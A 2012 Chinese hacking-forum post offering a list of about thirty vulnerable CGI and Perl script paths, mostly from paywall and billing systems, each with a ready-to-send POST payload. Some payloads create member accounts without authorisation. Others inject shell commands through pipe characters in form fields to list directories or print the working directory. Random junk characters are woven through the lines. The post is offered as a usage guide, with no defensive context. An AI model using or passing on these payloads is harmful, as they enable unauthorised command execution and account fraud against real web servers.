找回密码
 立即注册
查看: 3103|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================. J5 y5 m7 C' G  U
& N5 Z# f  \  b8 ~
/smspass.pl
4 J1 p7 v2 r) W/ w3 p8 |: Nusername=username&password=password
- g- E8 s& P1 B- B9 g. f1 |' M& q+ ?1 F+ m% q
/index.cgi8 r7 v/ E. I, v. ?  f$ g: n2 C
wei=ren&gen=command/ ]; P1 F( K8 T3 X6 w

6 E2 u' {: P% i& Q% y$ S$ y/passmaster.cgi2 Q5 ~9 ~3 y  y; f- e
Action=Add&Username=Username&Password=Password
6 V" u  m$ }, y  W
. x( d$ b8 t2 O+ f4 T5 _5 H# W  ~/accountcreate.cgi, X" b9 x' e" j* M  v- V
username=username&password=password&ref1=|echo;ls|* M+ [3 [' g( V4 U) v
4 y& e8 p# E$ x6 E; G2 t7 C
/form.cgi+ o  v* D$ v6 c$ S
name=xxxx&email=email&subject=xxxx&response=|echo;ls|" Z. K0 y' j/ Y/ Y# A2 Y( ^$ y
( P& |. c6 `5 D6 E/ X: m) I
/addusr.pl
1 _; j- v1 \2 ^3 I& |0 h: r; P/cgi-bin/EuroDebit/addusr.pl( _' D+ N7 D. t" H
user=username&pass=Password&confirm=Password
8 ?1 M( s9 X/ W. S/ W3 u# Z, P5 R
/ccbill-local.asp
" J! n" a' |( r9 w+ ppost_values=username:password  @7 E6 v/ e6 U3 \" g7 t6 [2 ?! f% z
' f5 B' S; N9 N' k
/count.cgi
$ V( \* d/ D0 C$ A* B3 Qpinfile=|echo;ls -la;exit|* _2 c; S) U4 ?/ t% x

) J9 K% R: K: m. @' j/recon.cgi+ F, \0 L' |. V! L2 T
/recon.cgi?search
, w) t! @2 F& h8 d: V. B: X' t9 G, `& P- jsearchoption=1&searchfor=|echo;ls -al;exit|
. D  P  v& z% n- y8 B; [$ ]  ]5 R
% S( o& n9 U3 J1 s* X) `% N/verotelrum.pl+ b+ ^* R" Y8 |9 d8 r: I- q- G+ R
vercode=username:password:dseegsow:add:amount<&30>' r/ n5 ^- w# X- d5 s
, u" G9 l, \$ s/ m% H% m% L* [5 C
/af.cgi2 ^$ _! g# e. V' g5 e0 H
_browser_out=|echo;ls -la;exit;|
. g* b3 W3 O4 Y7 Z8 a0 W* A* r* r) |1 f
/modify.cgi
. I0 y% P* Z6 O/ |username=username&password=password&expire=30, R7 O7 f8 q$ E
1 I! c: v' l8 r# L
/openjournal.cgi+ ^; `" i( e, a& h; \3 B! e9 ]
edit=1&ct=2&go=|echo;ls -al;exit|& h# D8 ^! z2 y$ V* v- A! e1 l6 G

/ L7 S: l8 u3 O/gx9passwd.cgi
( V5 c' l- v1 L3 w  qcmd=ADD&user=username&pass=password
# A0 y; W# a+ i$ W1 N0 _! R
4 ?! U" I( f( F, |, v& x  a! G/probecontrol.cgi6 V2 E) r8 K7 H: M% @4 Y5 e
command=enable&username=username&password=password, }" X! v, ?, ?* v
$ R. P2 o9 A# F, Q1 L- _
/recon.cgi! ]$ o8 @8 p! d' P5 z" v5 S6 G0 h
searchoption=3&searchfor=echo;ls -la;exit
! m" V9 i  U  k8 ~. b' m0 v: m; g
6 j4 F+ s9 I% S: s2 \7 v/htadd.pl' ^& D# q+ x5 q" A+ L
configfile=|echo; ls -alt; exit) p! Y9 Q6 V  R# ]
# m+ n! U$ _- s
/gx9passwd.cgi
- O& P. l$ X1 F" l2 E8 |( W$ [cmd=ADD&user=username&pass=password& m' p5 m8 Q7 d+ g" `* u
/ C/ K5 ~( ^, U1 T( q" {
/ibill*.pl; G, ~, H) H- w6 ^  {  Z
reqtype=add&authpwd=authpwd&username=username&password=password
, y  f$ Q; W, J3 G! q; p# u. G0 Q) A" t) F
/cpay.cgi
# {$ ~) |+ m6 ?/ \% [" J7 _command=add_member&username=username(EMAIL)&password=password(DES)) N/ @$ y7 z( S2 a

) S* W4 m3 ^4 M/globill_ut.cgi
6 c9 k6 W! R- M$ A+ F3 q- S  c, m% sdo=add&username=username&password=password&wpassword=password
* n6 ?, N1 }0 E* V. W) d- H' ]% e4 p; N7 J
/usercontrol.cgi) B& R  [9 L1 |) H
command=enable&username=USER&password=PASS! S, k) J' ^* u9 u/ Q

, f9 O* G; _; Z/globoSALErum.cgi
( o( w! L3 M3 caction=ADD&seccode=seccode&login=username&password=password
  Q' ~5 v& J1 b0 f5 _8 q. n  c7 M" Z4 f: q/ A- K" l8 J/ [9 v5 H% q
/addusr.pl- D* I8 ^% A3 V0 c
user=USER&pass=PASS&confirm=PASS
9 _5 M; ]: g: g4 _  Y
# U, n. w3 n( A; h+ q$ V/ A/pincount.cgi) O0 o  b$ E, N! P
/cgi-bin/mastergate/pincount.cgi; M. y4 A& Z& _% `- h
pinfile=|echo;pwd;exit|
+ X( p8 K# u6 i7 I6 g/ ^0 c1 k9 A: Z4 X% x
/accountcreate.cgi
$ `9 ~: ?4 u- F" W- n/cgi-bin/gateway/accountcreate.cgi
( v& n3 h& j( C' H+ q: }username=username&password=password&password2=password&ref1=|echo;ls -al;exit
# Y3 t- W4 t8 g) n. ]3 g6 Z% G: E' j" h3 f, K; o4 U
/af.cgi( I% E& v5 v! M* p% M
/env.cgi
7 K0 f: l. g7 k) u1 w$ y5 n0 yADD+;echo;pwd;exit* [" F/ h, d+ `2 k
& m' K+ L! [4 F* W7 v( Q
/count.cgi
9 [. n) F( l3 z' t: {pinfile=|echo;pwd;exit|5 m$ ^* j6 ]( R; F6 W1 Y7 _9 Q
% {' I0 j1 c/ Y7 m# Q; b
/recon.cgi
4 E, x1 P% G1 C; D7 d+ esearchoption=1&searchfor=|echo;ls%20-al;exit|
( L) X1 i: ?; ^: v! g
8 q! E+ k8 n- i, I, u* |/add.cgi
9 F' N* K' m" C( _4 pusername=username&password=password&expire=30
+ }+ |2 f, W9 i4 O7 C1 v) k  b8 J) z2 Y% o
==============================
) m5 ?+ E) B6 k1 i
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表